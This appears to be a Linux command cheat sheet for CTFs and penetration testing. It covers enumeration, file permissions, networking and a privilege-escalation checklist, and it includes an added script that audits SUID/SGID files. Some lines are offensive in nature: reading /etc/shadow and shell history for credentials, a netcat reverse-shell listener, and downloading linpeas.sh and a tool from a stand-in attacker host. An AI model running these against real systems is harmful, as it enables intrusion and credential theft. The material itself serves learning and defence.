Linux command reference
The commands you reach for constantly in CTFs and on the job: enumeration, permissions, networking and searching.
Orientation
whoami # current user
id # uid, gid and group memberships
hostname # machine name
uname -a # kernel and architecture
pwd # where am I
sudo -l # what can I run as root? (priv-esc gold)
Files and permissions
ls -la # long listing incl. hidden files and permissions
chmod 640 file # set permissions (owner rw, group r, others none)
chmod +x script # make executable
chown user:grp f # change owner and group
stat file # full metadata incl. timestamps
Permission bits read as owner / group / others, each rwx:
| Symbolic | Octal | Meaning |
|---|---|---|
| rwx | 7 | read + write + execute |
| rw- | 6 | read + write |
| r-x | 5 | read + execute |
| r-- | 4 | read only |
So chmod 755 = owner full, group and others read+execute. The leading special bits matter for security:
find / -perm -4000 -type f 2>/dev/null # find SUID binaries (priv-esc)
find / -perm -2000 -type f 2>/dev/null # find SGID binaries
A SUID binary runs with its owner's privileges, not the caller's; a SUID-root program with a flaw is a classic local privilege-escalation route.
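From the defender's side, the same `find` queries feed a SUID/SGID inventory that is compared against a known-good list. The script below is an added example, not part of the original reference: it decodes octal modes including the special bits and tags each SUID/SGID file as known or NEW. The function names and the baseline format (one absolute path per line) are assumptions of this example, and it relies on `stat -c` as provided by GNU coreutils or BusyBox.

```shell
#!/bin/sh
# Added example: decode octal modes (incl. special bits) and inventory
# SUID/SGID files against a baseline. The baseline file (one absolute path
# per line) is a hypothetical format chosen for this example.

# triad DIGIT SPECIAL_SET SPECIAL_CHAR -> e.g. "rwx", "r-s", "r-S"
triad() {
  r=-; w=-; x=-
  if [ $(( $1 & 4 )) -ne 0 ]; then r=r; fi
  if [ $(( $1 & 2 )) -ne 0 ]; then w=w; fi
  if [ $(( $1 & 1 )) -ne 0 ]; then x=x; fi
  if [ "$2" -ne 0 ]; then
    # Lowercase = special bit plus execute; uppercase = special bit without execute.
    case "$x$3" in
      xs) x=s ;; xt) x=t ;; -s) x=S ;; -t) x=T ;;
    esac
  fi
  printf '%s' "$r$w$x"
}

# mode_to_symbolic 4755 -> rwsr-xr-x
mode_to_symbolic() {
  m=$1
  while [ "${#m}" -lt 4 ]; do m="0$m"; done   # left-pad: 755 -> 0755
  sp=${m%???}; rest=${m#?}                    # special digit, then u/g/o digits
  u=${rest%??}; g=${rest#?}; g=${g%?}; o=${rest#??}
  printf '%s%s%s\n' \
    "$(triad "$u" $(( sp & 4 )) s)" \
    "$(triad "$g" $(( sp & 2 )) s)" \
    "$(triad "$o" $(( sp & 1 )) t)"
}

# audit_special DIR [BASELINE]: one line per SUID/SGID file:
#   known|NEW  symbolic-mode  owner  path
audit_special() {
  find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort |
  while IFS= read -r f; do
    tag=NEW
    if [ -n "${2:-}" ] && grep -qxF -- "$f" "$2"; then tag=known; fi
    printf '%s %s %s %s\n' "$tag" \
      "$(mode_to_symbolic "$(stat -c '%a' "$f")")" "$(stat -c '%U' "$f")" "$f"
  done
}
```

Source the file and run `audit_special /usr/bin baseline.txt` (the baseline name is a placeholder); any line tagged NEW is a SUID/SGID file that was not in the recorded inventory and deserves a look.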
Searching
grep -r "password" /etc 2>/dev/null # recursive search for a string
grep -i pattern file # case-insensitive
find / -name "*.conf" 2>/dev/null # find by name
find /home -mtime -1 # modified in last 24h
locate filename # fast indexed search
which nmap # path of a command
Users, processes and services
cat /etc/passwd # accounts (note shells: nologin vs bash)
cat /etc/shadow # password hashes (root-readable only)
ps aux # all running processes
top / htop # live process view
systemctl status sshd # service state
crontab -l # scheduled jobs for current user
cat /etc/crontab # system-wide cron (priv-esc target)
Networking
ip a # interface addresses (replaces ifconfig)
ip route # routing table
ss -tulpn # listening TCP/UDP ports + owning process
netstat -tulpn # older equivalent of ss
curl -I http://host # fetch HTTP headers only
wget http://host/file # download a file
ping -c4 host # four ICMP echoes
dig example.com # DNS lookup
nc -lvnp 4444 # netcat listener (catch a reverse shell)
Permissions / privilege-escalation checklist
sudo -l # misconfigured sudo rights
find / -perm -4000 2>/dev/null # SUID binaries
cat /etc/crontab # writable scripts run as root?
ls -la /etc/cron.* # scheduled job directories
env # leaked secrets, PATH issues
cat ~/.bash_history # credentials in history
File transfer in a pinch
# On attacker box: serve current directory over HTTP
python3 -m http.server 8000
# On target: pull a file
wget http://ATTACKER:8000/linpeas.sh
curl http://ATTACKER:8000/tool -o tool
# Base64 a small file to copy/paste across a shell
base64 -w0 secret.bin
Quick reference: making sense of a shell
- `2>/dev/null` discards error output (used above to silence "permission denied" noise while searching as a low-priv user).
- `|` pipes one command's output into the next; `>` writes to a file (overwrite), `>>` appends.
- A reverse shell connects from the target to you (useful past inbound firewalls); a bind shell listens on the target.